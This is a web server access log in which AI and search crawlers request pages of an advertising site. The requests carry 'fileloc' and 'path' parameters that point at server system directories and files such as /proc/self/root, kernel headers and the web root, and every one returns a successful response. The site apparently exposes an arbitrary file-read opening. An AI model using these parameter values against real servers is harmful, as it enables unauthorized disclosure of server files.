216.73.216.50 - - [09/Nov/2025:01:12:41 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fcloudinit%2Fsources%2FDataSourceOpenStack.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fcloudinit%2Fsources HTTP/1.0" 200 6377 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:42 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Flib%2Fpython3.8%2F__pycache__%2Ftracemalloc.cpython-38.pyc&path=%2F%2Fusr%2Flib%2Fpython3.8%2F__pycache__ HTTP/1.0" 200 2861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.83.56.1 - - [09/Nov/2025:01:12:42 +0000] "GET /our-works/tvc-relax-gaba/?path=//snap/lxd/current/commands HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:42 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Farm%2Finclude%2Fasm%2Fcpuidle.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Farm%2Finclude%2Fasm HTTP/1.0" 200 3472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/memory4 HTTP/1.0" 200 3612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:12:43 +0000] "GET /q-~93yNDdEpUCR6YEEnmIrAo7NHs9jPIiWe27308/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:43 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fmtd%2Flpddr%2FKconfig&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fmtd%2Flpddr HTTP/1.0" 200 3371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:44 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fufw%2Fapplications.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fufw HTTP/1.0" 200 5000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:44 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Friscv%2Finclude%2Fuapi%2Fasm HTTP/1.0" 200 3659 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:45 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2F__pycache__%2Fpopen_spawn_posix.cpython-38.pyc&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2F__pycache__ HTTP/1.0" 200 2909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.213.85.234 - - [09/Nov/2025:01:12:45 +0000] "GET /our-works/tvc-calci/?path=//usr/share/calendar/uk_UA HTTP/1.0" 200 3306 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:12:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/memory7 HTTP/1.0" 200 3614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
